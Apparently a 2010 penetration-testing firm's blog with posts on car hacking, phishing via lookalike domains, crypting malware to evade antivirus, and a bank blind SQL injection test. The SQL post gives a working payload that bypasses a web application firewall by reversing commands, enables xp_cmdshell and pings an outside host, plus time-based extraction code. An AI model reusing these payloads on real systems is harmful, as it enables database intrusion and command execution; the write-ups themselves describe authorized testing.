Thursday, December 2, 2010

Untitled

I recently participated in a panel at the BASC conference that was held at the Microsoft New England Research & Development (NERD) building at One Memorial Drive in Cambridge. One of the questions that surfaced inspired me to write this article.

While there are more security solutions available today than ever before, are we actually becoming more secure, or is the gap growing? The short answer is both. The security industry is reactive: it can only respond to threats, it cannot predict them. That is because threats are defined by malicious hackers and technology-savvy criminals, not by the security industry. Antivirus technology, for example, was created in response to viruses that hackers were already writing. So yes, security is getting better and technologies are advancing, yet the gap is still growing rapidly. One major part of the problem is that people adopt new technologies too quickly. They don’t stop to question those technologies from the perspective of a hacker…

A prime example of this problem is clearly demonstrated within the automotive industry. The computer systems in automobiles were not designed to withstand any sort of real hacker threat. This wasn’t much of a problem at first because automotive computer systems weren’t Internet connected, and initially they didn’t have direct control over things like the brakes and the accelerator. That all changed as the automotive industry advanced and as people wanted the convenience that computer technology could bring to the table. Now automotive computer systems directly control critical automotive functions, and a hacker who can interface with the computer system can cause potentially catastrophic failures. Despite this, the problem wasn’t perceived as particularly high risk because accessing the computer system required physical access to the car (or close proximity, for TPMS-style hacks). That is all going to change when the Chevy Volt hits the streets, since the Chevy Volt actually has its own IP address and is network connected. Is the risk really worth the convenience?

Another good example of how we adopt technology too quickly can be found in critical infrastructure (power, water, communications, etc.). Just as in the automotive industry, critical systems were not initially designed to be plugged into the Internet. These are the systems that control the water coolant levels in our nuclear power plants, the mixtures of chemicals in water treatment plants, and so on. Some of these critical systems were designed in the 1960s, when the concept of the “hacker threat” didn’t exist. Others are very modern, but even those are designed to be functional more than they are designed to be secure. Back in the day, power plants, water treatment plants, and the like were air-gapped to isolate them from potentially harmful environments. But as the Internet offered more and more convenience, the air-gaps that once existed have become almost extinct. Now our critical systems are connected to the Internet and exposed to real hacker threats; and do they get hacked? Yes. Again, is the risk really worth the convenience?

Of course, an example that everyone can relate to is business networks. Business networks are constantly evolving, and new technologies are continually being adopted without proper vetting. These technologies often include web applications, security technologies, backup technologies, content management systems, etc. They usually promise to make things easier and thus save time, which equates to saving money. For example, the other week we were delivering a penetration test for a pharmaceutical company. This company had a video conference system set up so that they could speak with remote offices and have “face to face” conversations. They loved the technology because it made for more productive meetings, and we loved the technology because it was easy to hack.

Despite the fact that the security industry is evolving at a rapid pace, it can’t keep up with the volume of people that are prematurely adopting new and untested technologies. This adoption causes the gap between good security and security risk to grow. To help close the gap, consumers need to start challenging their vendors. They need to ask their vendors to demonstrate the security of their technology, and maybe even to make some sort of guarantee about it. There are some solid companies out there that offer services designed to enhance the security of technology products. One such company is Veracode (no affiliation with Netragard).

Thursday, November 11, 2010

Fox 25 News Interview

Our (Netragard's) founder and president, Adriel Desautels, was recently interviewed by the local news (Fox 25) about car hacking. We thought that we'd write a quick entry and share it with you. Thank you to Fox 25 for doing such a good job with the interview. A note for the AAA guy, though: now that cars have IP addresses (which is the case today), hackers won't need to "pull up next to you to hack [your car]", and turning the car off is the least of the problems. Hackers will be able to do it from their location of choice, and trust us when we say that "firewalls" don't pose much of a challenge at all. Anyway, enjoy the video and please feel free to comment.

http://www.myfoxboston.com/dpp/news/special_reports/could-your-car-be-a-hackers-target-20101111

Monday, September 13, 2010

The Human Vulnerability

It seems to us that one of the biggest threats that businesses face today is socially augmented malware attacks. These attacks have an extremely high degree of success because they target and exploit the human element. Specifically, it doesn't matter how many protective technology layers you have in place if the people that you've hired are putting you at risk, and they are.

Case in point: the “here you have” worm, which propagates predominantly via e-mail and promises the recipient access to PDF documents or even pornographic material. This specific worm compromised major organizations such as NASA, ABC/Disney, Comcast, Google, Coca-Cola, etc. How much money do you think those companies spend on security technology over a one-year period? How much good did it do at protecting them from the risks introduced by the human element? (Hint: none.)

Here at Netragard we have a unique perspective on the issue of malware attacks because we offer pseudo-malware testing services. Our pseudo-malware module, when activated, authorizes us to test our clients with highly customized, safe, controlled, and homegrown pseudo-malware variants. To the best of our knowledge we are the only penetration testing company to offer such a service (and no, we're not talking about the meterpreter).

Attack delivery usually involves attaching our pseudo-malware to emails or binding the pseudo-malware to PDF documents or other similar file types. In all cases we make it a point to pack (or crypt) our pseudo-malware so that it doesn't get detected by antivirus technology (see this blog entry on bypassing antivirus). Once the malware is activated, it establishes an encrypted connection back to our offices and provides us with full control over the victim computer. Full control means access to the software and hardware including but not limited to keyboard, mouse, microphone and even the camera. (Sometimes we even deliver our attacks via websites like this one by embedding attacks into links).

So how easy is it to penetrate a business using pseudo-malware? Well, in truth, it's really easy. Just last month we finished delivering an advanced external penetration test for one of our more secure customers. We began crafting an email that contained our pseudo-malware attachment and accidentally hit the send button without any message content. Within 45 seconds of clicking send on that otherwise blank email, we had 15 inbound connections from 15 newly infected client computer systems. That means that at least 15 employees tried to open our pseudo-malware attachment despite the fact that the email was blank! Imagine the degree of success that is possible with a well-crafted email.

One of the computer systems that we were able to compromise was running a service with domain admin privileges. We were able to use that computer system (impersonation attack involved) to create an account for ourselves on the domain (which happened to be the root domain). From there we were able to compromise the client's core infrastructure (switches, firewalls, etc) due to a password file that we found sitting on someone's desktop (thank you for that). Once that was done, there really wasn't much more that we had left to do, it was game over.

The fact of the matter is that there's nothing new about taking advantage of people that are willing to do stupid things. But is it really stupidity, or is it just that employees don't have a sense of accountability? Our experience tells us that in most cases it's a lack of accountability that's the culprit.

When we compromise a customer using pseudo-malware, one of the recommendations that we make to them is that they enforce policies by holding employees accountable for violations. We think that the best way to do that is to require employees to read a well-crafted policy and then to take a quiz based on that policy. When they pass the quiz they should be required to sign a simple agreement that states that they have read the policy, understood the policy, and agree to be held accountable for any violations that they make against the policy.

In our experience there is no better security technology than a paranoid human that is afraid of being held accountable for doing anything irresponsible (aka: violating the policy). When people are held accountable for something like security they tend to change their overall attitude towards anything that might negatively affect it. The result is a significantly reduced attack surface. If all organizations took this strict approach to policy enforcement then worms like the "here you have" worm wouldn't be such a big success.

Compare the cost and benefit of enforcing a strict and carefully designed security policy to the cost and benefit of expensive (and largely ineffective) security technologies. Which do you think will do a better job of protecting your business from real threats? It's much more difficult to hack a network that is managed by people who are held accountable for its security than it is to hack a network that is protected by technology alone.

So in the end there's really nothing special about the "here you have" worm. It’s just another example of how malicious hackers are exploiting the same human vulnerability using an ever so slightly different malware variant. Antivirus technology certainly won’t save you and neither will other expensive technology solutions, but a well-crafted, cost-effective security policy just might do the trick.

It’s important to remember that well-written security policies don’t only impact human behavior; they generally result in better management of systems, which translates to better technological security. The benefits are significant and the overall cost is small in comparison.

Tuesday, August 31, 2010

That nice, new computerized car you just bought could be hackable

Link: http://news.cnet.com/8301-27080_3-20015184-245.html

Of course, your car is probably not a high-priority target for most malicious hackers. But security experts tell CNET that car hacking is starting to move from the realm of the theoretical to reality, thanks to new wireless technologies and ever more dependence on computers to make cars safer, more energy-efficient, and modern.

"Now there are computerized systems and they have control over critical components of cars like gas, brakes, etc.," said Adriel Desautels, chief technology officer and president of Netragard, which does vulnerability assessments and penetration testing on all kinds of systems. "There is a premature reliance on technology."

[Figure: illustration of a tire pressure monitoring system, with four antennas, from the report detailing how researchers were able to hack the wireless system. Credit: University of South Carolina, Rutgers University (PDF)]

Often the innovations are designed to improve the safety of the cars. For instance, after a recall of Firestone tires that were failing on Fords in 2000, Congress passed the TREAD (Transportation Recall Enhancement, Accountability and Documentation) Act, which required that tire pressure monitoring systems (TPMS) be installed in new cars to alert drivers if a tire is underinflated.

Wireless tire pressure monitoring systems, which also were touted as a way to increase fuel economy, communicate via a radio frequency transmitter to a tire pressure control unit that sends commands to the central car computer over the Controller-Area Network (CAN). The CAN bus, which allows electronics to communicate with each other via the On-Board Diagnostics systems (OBD-II), is then able to trigger a warning message on the vehicle dashboard.

Researchers at the University of South Carolina and Rutgers University tested two tire pressure monitoring systems and found the security to be lacking. They were able to turn the low-tire-pressure warning lights on and off from another car traveling at highway speeds, from 40 meters (about 130 feet) away, using low-cost equipment.

"While spoofing low-tire-pressure readings does not appear to be critical at first, it will lead to a dashboard warning and will likely cause the driver to pull over and inspect the tire," said the report (PDF). "This presents ample opportunities for mischief and criminal activities, if past experience is any indication."

"TPMS is a major safety system on cars. It's required by law, but it's insecure," said Travis Taylor, one of the researchers who worked on the report. "This can be a problem when considering other wireless systems added to cars. What does that mean about future systems?"

The researchers do not intend to be alarmist; they're merely trying to figure out what the security holes are and to alert the industry to them so they can be fixed, said Wenyuan Xu, another researcher on the project. "We are trying to raise awareness before things get really serious," she said.

Another report in May highlighted other risks with the increased use of computers coordinated via internal car networks. Researchers from the University of Washington and University of California, San Diego, tested how easy it would be to compromise a system by connecting a laptop to the onboard diagnostics port that they then wirelessly controlled via a second laptop in another car. Thus, they were able to remotely lock the brakes and the engine, change the speedometer display, as well as turn on the radio and the heat and honk the horn.

Granted, the researchers needed to have physical access to the inside of the car to accomplish the attack. Although that minimizes the likelihood of an attack, it's not unthinkable to imagine someone getting access to a car dropped off at the mechanic or parking valet.

"The attack surface for modern automobiles is growing swiftly as more sophisticated services and communications features are incorporated into vehicles," that report (PDF) said. "In the United States, the federally-mandated On-Board Diagnostics port, under the dash in virtually all modern vehicles, provides direct and standard access to internal automotive networks. User-upgradable subsystems such as audio players are routinely attached to these same internal networks, as are a variety of short-range wireless devices (Bluetooth, wireless tire pressure sensors, etc.)."

Engine Control Units
The ubiquitous Engine Control Units themselves started arriving in cars in the late 1970s as a result of the California Clean Air Act and initially were designed to boost fuel efficiency and reduce pollution by adjusting the fuel and oxygen mixture before combustion, the paper said. "Since then, such systems have been integrated into virtually every aspect of a car's functioning and diagnostics, including the throttle, transmission, brakes, passenger climate and lighting controls, external lights, entertainment, and so on," the report said.

It's not just that there are so many embedded computers, it's that safety-critical systems are not isolated from non-safety-critical systems, such as entertainment systems, but are "bridged" together to enable "subtle" interactions, according to the report. In addition, automakers are linking Engine Control Units with outside networks like global positioning systems. GM's OnStar system, for example, can detect problems with systems in the car and warn drivers, place emergency calls, and even allow OnStar personnel to remotely unlock cars or stop them, the report said.

In an article entitled "Smart Phone + Car = Stupid?" on the EETimes site in late July, Dave Kleidermacher noted that GM is adding smartphone connectivity to most of its 2011 cars via OnStar. "For the first time, engines can now be started and doors locked by ordinary consumers, from anywhere on the planet with a cell signal," he wrote.

Car manufacturers need to design the systems with security in mind, said Kleidermacher, who is chief technology officer at Green Hills Software, which builds operating system software that goes into cars and other embedded systems.

"You can not retrofit high-level security to a system that wasn't designed for it," he told CNET. "People are building this sophisticated software into cars and not designing security in it from the ground up, and that's a recipe for disaster."

Representatives from GM OnStar were not available for comment late last week or this week, a spokesman said.

"Technology in cars is not designed to be secure because there's no perceived threat. They don't think someone is going to hack a car like they're going to hack a bank," said Desautels of Netragard. "For the interim, network security in cars won't be a primary concern for manufacturers. But once they get connected to the Internet and have IP addresses, I think they'll be targeted just for fun."

The threat is primarily theoretical at this point for a number of reasons. First, there isn't the same financial incentive in hacking cars as there is in hacking online bank accounts. Second, there isn't one dominant platform used in cars that can give attackers the same bang for their buck as there is on personal computers.

"The risks are certainly increasing because there are more and more computers in the car, but it will be much tougher to (attack) than with the PC," said Egil Juliussen, a principal analyst at market research firm iSuppli. "There is no equivalent to Windows in the car, at least not yet, so (a hacker) will be dealing with a lot of different systems and have to have some knowledge about each one. It doesn't mean a determined hacker couldn't do it."

But Juliussen said drivers don't need to worry about anything right now. "This is not a problem this year or next year," he said. "It's five years down the road, but the way to solve it is to build security into the systems now."

Infotainment systems
In the meantime, the innovations in mobile communications and entertainment aren't limited to smartphones and iPads. People want to use their devices easily in their cars and take advantage of technology that will let them make calls and listen to music without having to push any buttons or touch any track wheels. Hands-free telephony laws in many states require as much.

Millions of drivers are using the SYNC system, which has shipped in more than 2 million Ford cars and allows people to connect digital media players and Bluetooth-enabled mobile phones to their car entertainment system and use voice commands to operate them. The system uses Microsoft Auto as the operating system. Other cars offer less-sophisticated mobile device connectivity.

"A lot of cars have Bluetooth car kits built into them so you can bring the cell phone into your car and use your phone through microphones and speakers built into the car," said Kevin Finisterre, lead researcher at Netragard. "But vendors often leave default passwords."

Ford uses a variety of security measures in SYNC, including only allowing Ford-approved software to be installed at the factory and default security set to Wi-Fi Protected Access 2 (WPA2), which requires users to enter a randomly chosen password to connect to the Internet. To protect customers when the car is on the road and the Mobile Wi-Fi Hot Spot feature is enabled, Ford also uses two firewalls on SYNC, a network firewall similar to a home Wi-Fi router and a separate central processing unit that prevents unauthorized messages from being sent to other modules within the car.

"We use the security models that normal IT folks use to protect an enterprise network," said Jim Buczkowski, global director of electrical and electronics systems engineering for Ford SYNC.

Not surprisingly, there is a competing vehicle "infotainment" platform being developed that is based on open-source technology. About 80 companies have formed the Genivi Alliance to create open standards and middleware for information and entertainment solutions in cars.

Asked if Genivi is incorporating security into its platform from the get-go, Sebastian Zimmermann, chair of the consortium's product definition and planning group, said it is up to the manufacturers that are creating the branded devices and custom apps to build security in and to take advantage of security mechanisms provided in Linux, the open-source operating system the platform is based on.

"Automakers are aware of security and have taken it seriously...It's increasingly important as the vehicle opens up new interfaces to the outside world," Zimmermann said. "They are trying to find a balance between openness and security."

Another can of security worms being opened is the fact that cars may follow the example of smart phones and Web services by getting their own customized third-party apps. Hughes Telematics reportedly is working with automakers on app stores for drivers.

This is already happening to some extent, for instance, with video cameras becoming standard in police cars and school buses, bringing up a host of security and privacy issues.

"We did a penetration test where we had a police agency that has some in-car cameras," Finisterre of Netragard said, "and we were able to access the cameras remotely and have live audio and video streams from the police car due to vulnerabilities in the manufacturing systems."

"I'm sure (eventually) there is going to be smart pavement and smart lighting and other dumb stuff that has the capability of interacting with the car in the future," he said. "Technology is getting pushed out the door with bells and whistles and security gets left behind."

Friday, August 6, 2010

Bypassing Antivirus to Hack You

Many people assume that running antivirus software will protect them from malware (viruses, worms, trojans, etc), but in reality the software is only partially effective. This is true because antivirus software can only detect malware that it knows to look for. Anything that doesn’t match a known malware pattern will pass as a clean and trusted file.


Antivirus technologies use virus definition files to define known malware patterns. Those patterns are derived from real world malware variants that are captured in the wild. It is relatively easy to bypass most antivirus technologies by creating new malware or modifying existing malware so that it does not contain any identifiable patterns.
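
To make the point concrete, here is a toy signature scanner written in Python. This is only a sketch of the general idea (the byte patterns and detection names below are invented, and real engines are far more sophisticated), but it shows why pattern matching fails: changing a single byte of a known pattern is enough to slip past it.

SIGNATURES = {
    b"EVIL_PAYLOAD_v1": "Pseudo.Malware.A",  # invented patterns, for illustration only
    b"\xde\xad\xbe\xef": "Pseudo.Malware.B",
}

def scan(data):
    # Flag the data only if it contains a byte pattern we already know about.
    for pattern, name in SIGNATURES.items():
        if pattern in data:
            return "infected: " + name
    return "clean"

print(scan(b"...EVIL_PAYLOAD_v1..."))  # infected: Pseudo.Malware.A
print(scan(b"...EVIL_PAYLOAD_v2..."))  # clean -- one byte changed, no match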

One of the modules that our customers can activate when purchasing Penetration Testing services from us is the Pseudo Malware module. As far as we know, we are one of the few Penetration Testing companies to actually use Pseudo Malware during testing. This module enables our customers to test how effective their defenses are against real-world malware threats, but in a safe and controllable way.

Our choice of Pseudo Malware depends on the target that we intend to penetrate and the number of systems that we intend to compromise. Sometimes we’ll use Pseudo Malware that doesn’t automatically propagate and other times we’ll use auto-propagation. We should mention that this Pseudo Malware is only “Pseudo” because we don’t do anything harmful with it and we use it ethically. The fact of the matter is that this Pseudo Malware is very real and very capable technology.

Once we’ve determined what Pseudo Malware variant to go with, we need to augment the Pseudo Malware so that it is not detectable by antivirus scanners. We do this by encrypting the Pseudo Malware binary with a special binary encryption tool. This tool ensures that the binary no longer contains patterns that are detectable by antivirus technologies.

Before Encryption: [image: scan results showing the pseudo-malware detected by most antivirus scanners]

After Encryption (Still Infected): [image: scan results showing the same file passing every scanner as clean]

As you can see from the scan results above, the Pseudo Malware was detected by most antivirus scanners before it was encrypted. We expected this because we chose a variant of Pseudo Malware that contained several known detectable patterns. The second image (after encryption) shows the same Pseudo Malware being scanned after encryption. As you can see, the Pseudo Malware passed all antivirus scanners as clean.

Now that we've prevented antivirus software from being able to detect our Pseudo Malware, we need to distribute it to our victims. Distribution can happen in many ways, including but not limited to infected USB drives, infected CD-ROMs, phishing emails augmented by IDN homograph attacks with the Pseudo Malware attached, Facebook, LinkedIn, MySpace, binding it to PDF-like files, etc.

Our preferred method for infection is email (or maybe not). This is because it is usually very easy to gather email addresses using various existing email harvesting technologies and we can hit a large number of people at the same time. When using email, we may embed a link that points directly to our Pseudo Malware, or we might just insert the malware directly into the email. Infection simply requires that the user click our link or run the attached executable. In either case, the Pseudo Malware is fast and quiet and the user doesn't notice anything strange.

Once a computer is infected with our Pseudo Malware it connects back to our Command and Control server and grants us access to the system unbeknownst to the user. Once we have access, we can do anything that the user can do, including but not limited to seeing the user's screen as if we were right there, running programs, installing software, uninstalling software, activating webcams and microphones, accessing and manipulating hardware, etc. More importantly, we can use that computer to compromise the rest of the network through a process called Distributed Metastasis.

Despite how easy it is to bypass antivirus technologies, we still very strongly recommend using them as they keep you protected from known malware variants.

Monday, June 14, 2010

Security Vulnerability Penetration Assessment Test?

Our philosophy here at Netragard is that security-testing services must produce a threat that is at least equal to the threat that our customers are likely to face in the real world. If we test our customers at a lesser threat level and a higher-level threat attempts to align with their risks, then they will likely suffer a compromise. If they do suffer a compromise, then the money that they spent on testing services might as well be added to the cost in damages that result from the breach.

This is akin to how armor is tested. Armor is designed to protect something from a specific threat. In order to be effective, the armor is exposed to a level of threat that is slightly higher than what it will likely face in the real world. If the armor is penetrated during testing, it is enhanced and hardened until the threat cannot defeat the armor. If armor is penetrated in battle then there are casualties. That class of testing is called Penetration Testing, and the level of threat produced has a very significant impact on test quality and results.

What is particularly scary is that many of the security vendors who offer Penetration Testing services either don't know what Penetration Testing is or don’t know the definitions for the terms. Many security vendors confuse Penetration Testing with Vulnerability Assessments and that confusion translates to the customer. The terms are not interchangeable and they do not define methodology, they only define testing class. So before we can explain service quality and threat, we must first properly define services.

Based on the English dictionary, the word “Vulnerability” is best defined as susceptibility to harm or attack. Being vulnerable is the state of being exposed. The word “Assessment” is best defined as the means by which the value of something is estimated or determined, usually through the process of testing. As such, a “Vulnerability Assessment” is a best estimate as to how susceptible something is to harm or attack.

Let’s do the same for “Penetration Test”. The word “Penetration” is best defined as the act of entering into or through something, or the ability to make way into or through something. The word “Test” is best defined as the means by which the presence, quality, or genuineness of anything is determined. As such, the term “Penetration Test” means to determine the presence of points where something can make its way through or into something else.

Despite what many people think, neither term is specific to Information Technology. Penetration Tests and Vulnerability Assessments existed well before the advent of the microchip. In fact, the ancient Romans used a form of penetration testing to test their armor against various types of projectiles. Today, we perform Structural Vulnerability Assessments against things like the Eiffel Tower and the Golden Gate Bridge. Vulnerability Assessments are chosen because Structural Penetration Tests would cause damage to, or possibly destroy, the structure.

In the physical world Penetration Testing is almost always destructive (at least to a degree), but in the digital world it isn’t destructive when done properly. This is mostly because in the digital world we’re penetrating a virtual boundary and in the physical world we’re penetrating a physical boundary. When you penetrate a virtual boundary you’re not really creating a hole, you’re usually creating a process in memory that can be killed or otherwise removed.

When applied to IT Security, a Vulnerability Assessment isn't as accurate as a Penetration Test. This is because Vulnerability Assessments are best estimates, while Penetration Tests either penetrate or they don’t. As such, a quality Vulnerability Assessment report will contain few false positives (false findings), while a quality Penetration Testing report should contain absolutely no false positives (though it may contain theoretical findings).

The quality of service is determined by the talent of the team delivering the services and by the methodology used for service delivery. A team of research-capable ethical hackers with a background in exploit development and system / network penetration will usually deliver higher-quality services than a team that is not research-capable. If a team claims to be research-capable, ask them for example exploit code that they’ve written and for advisories that they’ve published.

Service quality is also directly tied to threat capability. The threat in this case is defined by the capability of real world malicious hackers. If testing services do not produce a threat level that is at least equal to the real world threat, then the services are probably not worth buying. After all, the purpose for security testing is to identify risks so that they can be fixed / patched / eliminated before malicious hackers exploit them. But if the security testing services are less capable than the malicious hacker, then chances are the hacker will find something that the service missed.

Friday, June 11, 2010

We Are Politically Incorrect


Back in February of 2009 we released an article called FaceBook from the hackers perspective. As far as we know, we were the first to publish a detailed article about using Social Networking Websites to deliver surgical Social Engineering attacks. Since that time, we noticed a significant increase in marketing hype around Social Engineering from various other security companies. The problem is that they're not telling you the whole truth.

The whole truth is that Social Engineering is a necessary but potentially dangerous service. Social Engineering at its roots is the act of exploiting the human vulnerability, and as such it is an offensive and politically incorrect service. If a customer’s business has any pre-existing social or political issues, then Social Engineering can be like putting a match to a powder keg. In some cases the damages can be serious and can result in legal action between employee and employer, or vice versa.

It’s for this reason that businesses need to make sure that their environments are conducive to receiving social attacks, and that they are prepared to deal with the emotional consequences that might follow. If employees are trained properly and if security policies are enforced that cover the social vector, then things “should” be ok. If those policies don’t exist and if there’s any internal turmoil, high-risk employees, or potentially delicate political situations, then Social Engineering is probably not such a great idea, as it will likely identify and exploit one of those pre-existing issues.

For example, we recently delivered services to a customer that had pre-existing issues but assumed that their environment was safe for testing with Social Engineering. In this particular case the customer had an employee, who we’ll call Jane Doe, who was running her own business on the side. Jane Doe was advertising her real employer’s name on her business website, making it appear as if there were a relationship between her employer and her business. She was also advertising her employer’s address as her business address on her FaceBook fan page. From our perspective, Jane Doe was a perfect Social Engineering target.

With this social risk identified, we decided that we’d impersonate Jane Doe and hijack the existing relationships that she had with our customer (her employer). We accomplished this with a specially crafted phishing attack.

The first step in the phish was to collect content for the phishing email. In this case Jane Doe had posted images to her FaceBook fan page that included a photo of herself and a copy of her business’s logo. We used those images to create an email that looked like it originated from Jane Doe’s email address on our customer’s network and offered the recipient discounted pricing. (Her FaceBook privacy settings were set to allow everybody.)

Once we had the content for the phishing email set up, we used an IDN homograph attack to register a new domain that appeared to be identical to our customer’s domain. For example, if our customer was SNOsoft and their real domain was snosoft.com, the fake domain looked just like “snosoft.com”.
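
As an aside, it's easy to see why these lookalike domains are so convincing. Here's a minimal Python sketch (the domain below is a made-up example, not our customer's) showing that a lookalike containing a Cyrillic character is a different string entirely, along with the punycode form that DNS actually resolves:

# Hypothetical lookalike of "snosoft.com" where the first "o" is the Cyrillic
# letter o (U+043E); the two render near-identically in most fonts.
real = "snosoft.com"
fake = "sn\u043esoft.com"

print(real == fake)         # False -- different Unicode code points
print(fake.encode("idna"))  # b'xn--...' -- what DNS resolvers actually see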

We embedded a link into the phishing email using the fake domain to give it a legitimate look and feel. The link was advertised as the place to click to get information about specially discounted offerings that were specific to our customer’s employees. Of course, the link really pointed to our web server, where we were hosting a browser-based exploit.

Then we collected email addresses using an enumerator and loaded those into a distribution list. We sent a test email to ourselves first to make sure that everything would render ok. Once our testing was complete, we clicked send and the phish was on its way. Within 15 minutes of delivering the attack, our customer called us and requested that all testing be stopped. But by that time, 38 people had already clicked on our embedded URL, and more clicks were on their way.

As it turns out, our customer wasn’t prepared to receive Social Engineering tests despite the fact that they requested them. At first they accused us of being unprofessional because we used Jane Doe’s picture in the phishing email, which was apparently embarrassing to Jane Doe. Then they accused us of being politically incorrect for the same reason.

So we asked our customer, “Do you think that a black-hat would refrain from doing this because it’s politically incorrect?” Then we said, “Imagine if a black-hat launched this attack, and received 38 clicks (and counting).” (Each click representing a potential compromise).

While we can’t go into much more detail for reasons of confidentiality, the phishing attack uncovered other more serious internal and political issues. Because of those issues, we had to discontinue testing and move to report delivery. There was no fault or error on our part as everything was requested and authorized by the customer, but this was certainly a case of the match and the powder keg.

Despite the unfortunate circumstances, the customer did benefit significantly from the services. Specifically, the customer became aware of some very serious social risks that would have been extremely damaging had they been identified and exploited by black-hat hackers. Even if it was a painful process for the customer, we’re happy that we were able to deliver the services as we did because they enabled our customer to reduce their overall risk and exposure profile.

The moral of the story is that businesses should take care and caution when requesting Social Engineering services. They should be prepared for uncomfortable situations and discoveries, and if possible they should train and prepare their employees in advance. In the end it boils down to one of two things: is it more important for a company to understand its risks, or is it more important to avoid embarrassing or offending an employee?

Sunday, May 16, 2010

REVERSE(noitcejnI LQS dnilB) Bank Hacking

Earlier this year we were hired to perform an Overt Web Application Penetration Test for one of our banking customers (did you click that?). This customer is a recurring customer, so we know that they have Web Application Firewalls and Network Intrusion Prevention Systems in play. We also know that they are very security savvy and that they respond to attacks promptly and appropriately.


Because this test was Overt in nature (non-stealth), we began testing by configuring Acunetix to use burpsuite-pro as a proxy. Then we ran an automated Web Application Vulnerability Scan with Acunetix and watched the scan populate burpsuite-pro with information. While the scan results were mostly fruitless, we were able to pick up with manual testing in burpsuite-pro.

While the automated scans didn’t find anything, our manual testing identified an interesting Blind SQL Injection vulnerability. It was the only vulnerability we discovered that had any real potential.

It’s important to understand the difference between standard SQL Injection Vulnerabilities and Blind SQL Injection Vulnerabilities. A standard SQL Injection Vulnerability returns useful error information to the attacker and usually displays that information in the attacker’s web browser. That information helps the attacker debug and refine the attack. Blind SQL Injection Vulnerabilities return nothing, which makes them much more difficult to exploit.

Since the target Web Application was protected by two different Intrusion Prevention Technologies, and since the vulnerability was a Blind SQL Injection Vulnerability, we knew that exploitation wasn’t going to be easy. To be successful we’d first need to defeat the Network Intrusion Prevention System and then the Web Application Firewall.

Defeating Network Intrusion Prevention Systems is usually fairly easy. The key is to find an attack vector that the Network Intrusion Prevention System can’t monitor. In this case (like most cases) our target Web Application’s server accepted connections over SSL (via HTTPS). Because SSL-based traffic is encrypted, the Network Intrusion Prevention System can’t intercept and analyze it.

Defeating Web Application Firewalls is a bit more challenging. In this case, the Web Application Firewall was the termination point for the SSL traffic and so it didn’t suffer from the same SSL blindness issues that the Network Intrusion Prevention System did. In fact, the Web Application Firewall was detecting and blocking our embedded SQL commands very successfully.

We tried some of the known techniques for bypassing Web Application Firewalls but to no avail. The vendor that makes this particular Web Application Firewall does an excellent job at staying current with the latest methods for bypassing Web Application Firewall technologies.

Then we decided that we’d try attacking backwards. Most SQL databases support a reverse function, which does just what you’d think: it returns the reverse of whatever string you feed it. So we wrote our commands backwards and encapsulated them in the REVERSE() function provided by the SQL server. When we fed our new reversed payloads to the Web Application, the Web Application Firewall failed to block the commands.

As it turns out, most (maybe all) Web Application Firewalls can be bypassed if you reverse the spelling of your SQL commands. So you’d rewrite “xp_cmdshell” as “llehsdmc_px” and then encapsulate it in the reverse function. As far as we know, we’re the first to discover and use this method to successfully bypass a Web Application Firewall.
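
You can see the trick in miniature with a short Python sketch (illustrative only; the string slice plays the role of the database's REVERSE() function). It builds a reversed payload like the real one shown further down:

# The command we want the database, not the WAF, to see:
cmd = 'master.dbo.sp_configure "xp_cmdshell", 1'

# Store it backwards so the WAF's pattern matching never sees "xp_cmdshell":
backwards = cmd[::-1]
print(backwards)  # 1 ,"llehsdmc_px" erugifnoc_ps.obd.retsam

# The database undoes the reversal at runtime via REVERSE():
payload = "DECLARE @a varchar(200); SET @a = REVERSE('%s'); EXEC(@a);" % backwards
print(payload)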

The next step in the attack was to reconfigure and enable the xp_cmdshell function. The xp_cmdshell is important as it executes a given command string as an operating-system command shell and returns any output rows of text. Simply put, it’s just like sitting at the DOS prompt.

The technique used to reconfigure the xp_cmdshell functionality is well known and well documented. But, since we did it using backwards commands we thought that we would show you what it looked like.

var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@b) RECONFIGURE SET @c = REVERSE ('"moc.dragarten gnip" llehsdmc_px') EXEC (@c);--

The above SQL commands do the following three things:

1-) master.dbo.sp_configure "show advanced options", 1

Use the “show advanced options” option to display the sp_configure system stored procedure advanced options. When you set show advanced options to 1, you can list the advanced options by using sp_configure. The default is 0. The setting takes effect immediately without a server restart.

2-) master.dbo.sp_configure "xp_cmdshell", 1

This enables the xp_cmdshell functionality in the MsSQL database so that we can execute operating-system commands by calling xp_cmdshell. xp_cmdshell is disabled by default.

3-) C:\> ping netragard.com

Because we were dealing with a Blind SQL Injection vulnerability, we needed a creative way to confirm that we’d successfully re-enabled the xp_cmdshell function. To do that we set up a sniffer on our outside firewall interface and configured it to alert us when we received pings from our banking customer’s network. In the SQL payload (shown above) we included the command “ping netragard.com”. When we received ICMP packets from our customer’s network, we knew that our command had been executed successfully.
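
The listening side of that confirmation can be very simple. Here's a rough Python sketch (hypothetical and simplified; creating the raw socket requires root privileges) that prints the source address of every inbound ICMP packet, so a ping arriving from the customer's address range confirms that the injected command executed:

import socket

# Raw ICMP socket; requires root/administrator privileges to create.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))

while True:
    packet, (src, _) = s.recvfrom(65535)
    print("ICMP packet from", src)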

Now that we had confirmed that our Blind Reversed SQL Injection attack was viable and that we had successfully enabled the xp_cmdshell functionality, the last thing for us to do was to extract database information. But how do we extract database information using a Blind SQL Injection Vulnerability if the vulnerability never returns any information?

That's actually pretty easy. Most databases support conditional statements (if condition, then do something). So we used conditional statements combined with timing to extract database information. Specifically: if the table name equals "users", wait for 3 seconds; if it doesn't, return control immediately. If the response comes back 3 seconds late, we know that we've guessed the name of one of the tables correctly.
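
Conceptually, the extraction loop looks something like the simplified Python sketch below. The URL and parameter are hypothetical, the REVERSE() wrapping from earlier is omitted for clarity, and on MSSQL the delay comes from WAITFOR DELAY:

import time
import requests  # third-party library: pip install requests

URL = "https://bank.example/page"  # hypothetical vulnerable endpoint
DELAY = 3                          # seconds the conditional sleeps on a match

def table_exists(guess):
    # If a table named `guess` exists, the injected conditional delays the
    # response by DELAY seconds; otherwise the page returns immediately.
    inj = "';IF EXISTS (SELECT * FROM sysobjects WHERE name = '%s') WAITFOR DELAY '0:0:%d'--" % (guess, DELAY)
    start = time.time()
    requests.get(URL, params={"var": "1" + inj})
    return time.time() - start >= DELAY

for name in ("accounts", "users", "customers"):
    if table_exists(name):
        print("found table:", name)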

Sure there are other things that we could have done, but we're the good guys.

Monday, April 26, 2010

